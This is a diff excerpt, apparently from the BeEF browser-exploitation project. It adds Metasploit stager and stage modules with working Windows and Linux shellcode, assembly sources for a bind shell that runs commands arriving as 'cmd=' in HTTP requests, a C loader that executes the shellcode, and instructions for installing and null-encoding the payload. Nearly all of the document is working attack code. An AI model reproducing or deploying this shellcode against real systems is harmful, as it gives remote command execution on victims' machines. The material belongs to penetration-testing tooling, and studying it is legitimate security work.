+						"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
+						"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
+						"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
+						"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
+						"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
+						"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
+						"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
+						"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
+
+						"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
+						"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
+						"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
+						"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
+						"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
+						"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
+						"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
+						"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
+
+						"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
+						"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
+						"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
+						"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
+						"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
+						"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
+						"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
+						"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
+						"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+						"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
+
+						"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
+						"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
+						"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
+						"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
+						"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
+						"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
+						"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
+						"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
+						"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
+						"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
+
+						"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
+						"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
+						"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
+						"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
+						"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
+						"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
+						"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
+						"\xff\xd5\xe9\x58\xfe\xff\xff"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb

@@ -0,0 +1,49 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 54, 'n' ] },
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
+						"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
+						"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
+						"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
+						"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
+						"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
+						"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
+						"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
+						"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
+						"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
+						"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
+						"\x01\xc6\xff\xe6"
+				}
+			))
+	end
+
+end

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb

@@ -0,0 +1,47 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 47, 'n' ] },
+					'Payload' =>
+						"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
+						"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
+						"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
+						"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
+						"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
+						"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
+				}
+			))
+	end
+
+end

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb

@@ -0,0 +1,62 @@
+##
+# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Version'       => '$Revision: 9179 $',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Ty Miller'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 200, 'n' ] },
+					'Payload' =>
+						# Length: 299 bytes
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+						"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+						"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+						"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+						"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+						"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+						"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+						"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+						"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+						"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+						"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+						"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
+						"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
+						"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
+						"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
+						"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
+						"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
+				}
+			))
+	end
+
+end

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt

@@ -0,0 +1,37 @@
+
+Install into Metasploit on BackTrack:
+
+cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb 
+cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb 
+cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb 
+cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
+cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
+cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
+cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
+
+Check it works:
+
+msfpayload -l | grep beef_bind
+
+
+Get info on the payload:
+
+msfpayload windows/beef_shell/beef_bind S
+
+
+Dump stager and stage in C format:
+
+msfpayload windows/beef_shell/beef_bind C
+
+
+Dump stager in raw format:
+
+msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
+
+
+Encode stager to remove nulls:
+
+msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'
+
+
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm

@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stage.asm"	;setup web listener to proxy requests and responses to the shell
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm

@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stager.asm"	;setup bind port, receive web request, locate stage, execute it
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c

@@ -0,0 +1,36 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+A standalone version can be compiled with MinGW:
+c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
+
+and then executed with:
+c:\MinGW\bin>beefstager.exe 1234
+
+or just with the default port 4444:
+c:\MinGW\bin>beefstager.exe
+**/
+
+
+#include <stdlib.h>
+
+char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
+
+int main(int argc, char **argv)
+{
+if (argc == 2){
+  int port;
+  port = atoi(argv[1]);
+  if (port <= 0xFFFF){
+    code[200] = ((port & 0xFF00) >> 8) & 0xFF;
+    code[201] = ((port & 0xFF));
+  }	
+}
+
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+ return 0;
+}

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm

@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+  mov ebp, esp           ; Create a new stack frame
+  xor edx, edx           ; Zero EDX
+  mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+  mov edx, [edx+12]      ; Get PEB->Ldr
+  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:                ;
+  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+  movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+  xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the name
+  cmp al, 'a'            ; Some versions of Windows use lower case module names
+  jl not_lowercase       ;
+  sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  loop loop_modname      ; Loop untill we have read enough
+  ; We now have the module hash computed
+  push edx               ; Save the current position in the module list for later
+  push edi               ; Save the current module hash for later
+  ; Proceed to itterate the export address table, 
+  mov edx, [edx+16]      ; Get this modules base address
+  mov eax, [edx+60]      ; Get PE header
+  add eax, edx           ; Add the modules base address
+  mov eax, [eax+120]     ; Get export tables RVA
+  test eax, eax          ; Test if no export address table is present
+  jz get_next_mod1       ; If no EAT present, process the next module
+  add eax, edx           ; Add the modules base address
+  push eax               ; Save the current modules EAT
+  mov ecx, [eax+24]      ; Get the number of function names  
+  mov ebx, [eax+32]      ; Get the rva of the function names
+  add ebx, edx           ; Add the modules base address
+  ; Computing the module hash + function hash
+get_next_func:           ;
+  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+  dec ecx                ; Decrement the function name counter
+  mov esi, [ebx+ecx*4]   ; Get rva of next module name
+  add esi, edx           ; Add the modules base address
+  xor edi, edi           ; Clear EDI which will store the hash of the function name
+  ; And compare it to the one we want
+loop_funcname:           ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the ASCII function name
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+  jne loop_funcname      ; If we have not reached the null terminator, continue
+  add edi, [ebp-8]       ; Add the current module hash to the function hash
+  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+  jnz get_next_func      ; Go compute the next function hash if we have not found it
+  ; If found, fix up stack, call the function and then value else compute the next one...
+  pop eax                ; Restore the current modules EAT
+  mov ebx, [eax+36]      ; Get the ordinal table rva      
+  add ebx, edx           ; Add the modules base address
+  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+  mov ebx, [eax+28]      ; Get the function addresses table rva  
+  add ebx, edx           ; Add the modules base address
+  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+  add eax, edx           ; Add the modules base address to get the functions actual VA
+  ; We now fix up the stack and perform the call to the desired function...
+finish:
+  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+  pop ebx                ; Clear off the current modules hash
+  pop ebx                ; Clear off the current position in the module list
+  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+  pop ecx                ; Pop off the origional return address our caller will have pushed
+  pop edx                ; Pop off the hash value our caller will have pushed
+  push ecx               ; Push back the correct return value
+  jmp eax                ; Jump into the required function
+  ; We now automagically return to the correct caller...
+get_next_mod:            ;
+  pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+  pop edi                ; Pop off the current (now the previous) modules hash
+  pop edx                ; Restore our position in the module list
+  mov edx, [edx]         ; Get the next module
+  jmp short next_mod     ; Process this module

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm

@@ -0,0 +1,177 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; point esi to start of buffer, used as pseudo-frame pointer
+
+%include "src/block_pipes.asm"
+			 ; Create pipes to redirect stage stdin, stdout, stderr
+			 ; Input: EBP is api_call
+			 ; Output:
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  child stdin  write file descriptor (not inherited)
+			 ;       esp+08  child stdout read  file descriptor (not inherited)
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ;       esp+16  lpPipeAttributes structure (not used after block - 12 bytes)
+			 ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  mov edi,esi		 ; save esi since it gets clobbered
+
+%include "src/block_shell_pipes.asm"
+			 ; Create process with redirected stdin, stdout, stderr to our pipes
+			 ; Input:
+			 ;       EBP is api_call
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  not used
+			 ;       esp+08  not used
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ; Output: None.
+			 ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+  mov esi,edi		 ; restore esi
+
+ReadLoop:		 ; Read output from the child process
+
+clear_buffer:
+  mov ecx,0xFF8		 ; zero output buffer starting at esi+8 with 0xFF8 nulls
+  lea eax,[esi+8]	 ; point eax to start of command/output buffer
+zero_buffer:            
+  mov byte [eax],0	 ; push a null dword
+  inc eax		 ; point to the next byte in the buffer
+  loop zero_buffer	 ; keep looping untill we have zeroed the buffer
+
+
+response_headers:
+  push esi		 ; save pointer to start of buffer
+  lea edi,[esi+1048]	 ; set pointer to output buffer
+  call get_headers       ; locate the static http response headers
+  db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
+get_headers:
+  pop esi		 ; get pointer to response headers into esi
+  mov ecx, 98            ; length of http response headers
+  rep movsb              ; move the http headers into the buffer
+  pop esi		 ; restore pointer to start of buffer
+
+
+bind_port:
+  push esi		 ; save buffer pointer onto stack
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+  add esp, 0x1A0	 ; restore stack pointer
+  pop esi		 ; restore buffer pointer
+  mov [esi], edi	 ; save external socket to buffer
+
+
+recv:                    ; Receive the web request - must be a post request with command ending with a new line character
+  push byte 0            ; flags
+  push 0x400             ; allocated space for command (512 bytes)
+  mov ebx, esi           ; start of our request/response memory buffer
+  add ebx, 8		 ; start of our allocated command space
+  push ebx               ; start of our allocated command space
+  push dword [esi]       ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+find_cmd:  		 ; Search for "cmd=" in the web request
+  mov edx, [esp+0x64]    ; stage stdin read file descriptor (40)
+  mov ecx, 0x400         ; set ecx to be our buffer counter
+next:
+  cmp dword [ebx], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc ebx                ; point ebx to next char in request data
+  dec ecx                ; dec our buffer counter
+  jecxz read_file_check  ; if our counter is 0 then we found no command, so recv more data
+  jmp short next         ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+  add ebx, 0x03          ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command
+
+next_cmd_char:
+  inc ebx                ; move our command string pointer up one character
+  push ebx               ; save command pointer to the stack
+
+write_file:
+  push 0		 ; pOverlapped = NULL
+  lea edi,[esi+1040]	 ; 4 bytes for bytes written
+  push edi		 ; pBytesWritten
+  push 1		 ; nBytesToWrite
+  push ebx		 ; command string in buffer
+  mov ebx,[esp+70h]	 ; Child stdin
+  push ebx		 ; child stdin
+  push 0x5BAE572D	 ; hash(kernel32.dll, WriteFile)
+  call ebp		 ; WriteFile
+
+  pop ebx                ; restore command pointer from the stack
+  cmp byte [ebx], 0x0a   ; check if we have just sent a new line
+  jnz next_cmd_char      ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
+
+
+%include "src/block_sleep.asm"
+			 ; Input: None
+			 ; Output: None. Sleeps for x seconds
+			 ; Clobbers: None
+
+read_file_check:
+  xor eax, eax		 ; zero eax
+  push eax		 ; lpBytesLeftThisMessage
+  lea ebx,[esi+4]	 ; address to output the result - num bytes available to read
+  push ebx		 ; lpTotalBytesAvail
+  push eax		 ; lpBytesRead
+  push eax		 ; nBufferSize
+  push eax		 ; lpBuffer
+  lea ebx,[esp+74h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hNamedPipe
+  push 0xB33CB718	 ; hash(kernel32.dll,PeekNamedPipe)
+  call ebp		 ; PeekNamedPipe
+
+  test eax, eax		 ; check the function return correctly
+  jz close_handle	 ; no, then close the connection and start again
+  mov eax, [esi+4]	 ; Grab the number of bytes available
+  test eax, eax		 ; check for no bytes to read
+  jz close_handle	 ; no, then close the connection and start again
+
+read_file:
+  push 0                 ; pOverlapped = NULL
+  lea edi,[esi+1044]     ; output: number of bytes read
+  push edi               ; pBytesRead
+  push 0xB86             ; BytesToRead: remaining space in our allocated buffer
+  ;lea edi,[esi+1114]     ; start of remaining space in buffer after response headers
+  lea edi,[esi+1146]     ; start of remaining space in buffer after response headers
+  push edi               ; start of remaining space in buffer after response headers
+  lea ebx,[esp+70h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hFile: child stdout address
+  push 0xBB5F9EAD	 ; hash(kernel32.dll,ReadFile)
+  call ebp               ; ReadFile
+
+
+send_output:             ; send buffer to the external socket
+  push byte 0            ; flags
+  push 0xBE8             ; len
+  lea edi,[esi+1048]     ; start of output buffer
+  push edi               ; pointer to buffer
+  push dword [esi]       ; external socket
+  push 0x5F38EBC2        ; hash ( "ws2_32.dll", "send" )
+  call ebp               ; send(external_socket, *buf, len, flags);
+
+
+close_handle:
+  push dword [esi]	 ; hObject: external socket
+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+  jmp ReadLoop
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm

@@ -0,0 +1,47 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; save pointer to buffer since eax gets clobbered
+
+recv:                    ; Receive the web request containing the stage
+  push byte 0		 ; flags
+  push ebx		 ; allocated space for stage
+  push eax		 ; start of our allocated command space
+  push edi		 ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+
+close_handle:
+  push edi		 ; hObject: external socket
